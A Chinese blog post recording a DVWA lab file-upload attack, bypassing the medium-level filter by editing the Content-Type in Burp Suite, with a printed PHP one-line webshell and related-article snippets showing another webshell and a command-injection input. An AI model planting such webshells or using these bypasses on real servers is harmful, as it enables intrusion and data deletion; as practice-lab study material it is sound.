记录dvwa靶机下使用一句话木马的一次文件提交攻击

最新推荐文章于 2023-10-18 14:46:35 发布
最新推荐文章于 2023-10-18 14:46:35 发布
阅读量307 收藏
点赞数 2
分类专栏: kali 漏洞复现 前端学习 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45671944/article/details/114903504
版权
kali 同时被 3 个专栏收录
11 篇文章 1 订阅
订阅专栏
漏洞复现
11 篇文章 0 订阅
订阅专栏
前端学习
4 篇文章 0 订阅
订阅专栏

环境:搭建的OWASP靶机
攻击方式:使用一句话木马进行文件上传攻击
在这里插入图片描述此处将等级设置为中等

直接提交一句话木马发现并不能正常提交
在这里插入图片描述所以打开kali,并将kali的IP地址与主机进行代理,在这里插入图片描述打开kali的burp-suite将端口进行关联,
此处的cotent-type显示为八进制数据,需要将其改为二进制数据的图片格式
在这里插入图片描述二进制格式为:image/jepg
在这里插入图片描述然后回到主机中,可以发现,已经显示木马文件上传成功。

在这里插入图片描述
附:一句话木马的源代码:<?php @eval($-POST['cmd']);?>
进入内网后可以使用菜刀或者蚁剑进行本地提权,删除数据库等操作。

jrdh1209
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
k8s环境部署dvwa靶机
09-01
k8s环境部署dvwa靶机
DVWA靶机之命令注入
qq_43332077的博客
12-14 746
DVWA靶机之命令注入 command injection 命令注入是一种常见漏洞,通过攻击者拼接注入命令从而攻破漏洞,仅针对系统命令 low web页面提示ping a device,我们提交一个IP地址,测试反应 输入127.0.0.1 得知此处的用处为Ping 我们在IP地址后添加查询命令:127.0.0.1 && pwd,查看结果 在页面回显的最下端,我们看到回显 /v...
DVWA靶机-文件包含漏洞(File Inclusion)
weixin_43726831的博客
10-15 3620
DVWA靶机-文件包含漏洞(File Inclusion) 暴力破解-Brute Force 命令注入漏洞-Command injection
【网络安全零基础入门】002、OWASP靶机下载与安装(超详细,亲测可用)
热爱技术,热爱生活
07-23 1548
OWASP靶机下载与安装(超详细,亲测可用)
web渗透_一句话木马webshell)_dvwa环境
摸鱼域的空气。
04-04 7965
厄薇娅·瑞尔说,今天是个好日子。 一、什么是一句话木马 <?php @eval($_POST['a']); ?> 先来一段简单的一句话木马,解析下它的构造: @这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GET和POST;a参数名(自定义) 而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。 也就是说,你想执行什么代码,.
OWASP靶机安装
qq_43681802的博客
02-02 5458
渗透测试靶机系列–(webgoat安装) 文章目录渗透测试靶机系列--(webgoat安装)前言一、WEBGOAT是什么?二、安装步骤1.下载OWASP和vmware2.使用OWASP总结 前言 一、WEBGOAT是什么? WebGoat是OWASP组织研制出的用于进行web漏洞实验的Java靶场程序,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参
在kali上使用virtualBox搭建OWASPbwa靶机
jelly
02-20 2993
前言 最近学习使用kali系统,在电脑上安装kali+windows10的双系统,在学习了一些常规漏洞后,打算在kali系统中利用virtualBox搭建一个靶机,用于实战练习。 #使用环境 宿主主机:kali linux2019.11 使用软件:virtualbox 6.1.2_Debian r135662 靶机:OWASPbwa2.0 具体步骤 1.安装virtualbox 在 /etc/ap...
dvwa 低、中级别文件上传漏洞+php一句话木马
白帽小学二年级的博客
12-20 1523
dvwa简单(low)级别 用记事本写好一句话木马,并将后缀名改为.php文件 找一张小一点的图片进行测试,这里对图片大小有限制,太大无法上传 获得到的路径我们加到当前的URL后面访问一下,看能否看到我们上传的图片 可以看到,说明路径有效,这时我们就可以尝试直接上传我们的一句话木马.php文件,发现可以直接上传 将显示的路径../../hackable/uploads/1.php,复制到当前URL后面(有#号要删除)回车才能得到真正的路径 通过工...
bWAPP攻略
weixin_30480651的博客
04-22 1508
0x00、平台介绍 按照OWASP排序 0x01、A1-Injuction(注入) Low级别:不经过任何处理的接收用户数据 Medium级别:黑名单机制,转义了部分危险数据 High级别:全部转义,或者白名单机制 1.1HTML Injection-Reflected(GET,POST) Low: Payload: <a href=”https://www...
如何部署OWASP靶机
最新发布
xiaojiadong2019的博客
10-18 340
4.下图中的网络适配器选择NAT模式,如果NAT模式不能登录请切换到桥接模式(不建议使用桥接模式)7.使用默认用户名与密码登录 admin/admin。5.开启虚拟机,使用如下用户名和密码登录。(具体以自己虚拟机内IP地址为准)1.OWASP下载后解压到本地。6.登录DVWP系统界面。
Dvwa最新版本2022可用,下载到phpstudy,www目录下就可使用
06-28
【许可】DVWA是一个免费软件,在遵守自由软件基金会发布的GNU通用公共许可的前提下,你可以重新发布它和/或修改它。许可可以是版本3,或(由您选择)任何更高的版本。 DVWA的发行是希望它能够有用,但没有提供担保,...
搭建DVWA靶机所需全部资源.rar
10-13
初学者
DVWA、MCIR、pikachu、Mutillidae、BWAPP靶机安装包
03-24
DVWA、MCIR、pikachu、Mutillidae、BWAPP靶机安装包
Windows下搭建DVWA测试环境
07-02
Windows下搭建DVWA测试环境
一句话木马渗透DVWA(内附caidao工具下载链接)
weixin_68989528的博客
03-08 576
一句话木马渗透DVWA(内附caidao工具下载链接)
DVWA File upload& 一句话木马
young‘s blog
07-10 2375
一句话木马是什么: 例如:<?php @eval($_POST[young]);?> @的意思就是后面是啥东西执行时都不要报错 把eval 里面的字符串当作代码执行 $_POST[young] 超全局变量 用young参数把需要执行的语句传进去,然后通过eval里去执行这个语句,达到了目的。 例如需要输出young 在这里要注意几个问题,首先就是在语句的最后要加上;作为语句的结束。 在...
DVWA-文件上传全等级绕过(一句话木马+中国菜刀+蚁剑)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 1万+
DVWA文件上传前言一、low级别1.1 一句话木马1.2 中国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传一些木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 一、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
OWASP靶机下载安装详细过程
热门推荐
xxx_Python的博客
05-22 2万+
OWASP靶机下载安装详细过程一、 OWASP靶机下载二、 VM虚拟机三、 OWASP安装四、 OWASP启动运行 一、 OWASP靶机下载 下载地址:https://sourceforge.net/projects/owaspbwa/files/. 一般可直接点击“Download Latest Version”下载最新版本的OWASP靶机 二、 VM虚拟机 安装可自行上网查看安装教程,本次使用VM15pro 三、 OWASP安装 保证磁盘容量有10G左右或以上,解压下载的OWASP压缩包 打开VM虚
linux安装dvwa靶机
09-09
使用以下命令将DVWA压缩文件解压到`/var/www/html/`目录下: ``` unzip -d /var/www/html/ DVWA-master.zip ``` 3. 修改文件权限,以确保Apache用户可以访问DVWA文件使用以下命令修改文件权限: ``` chown ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值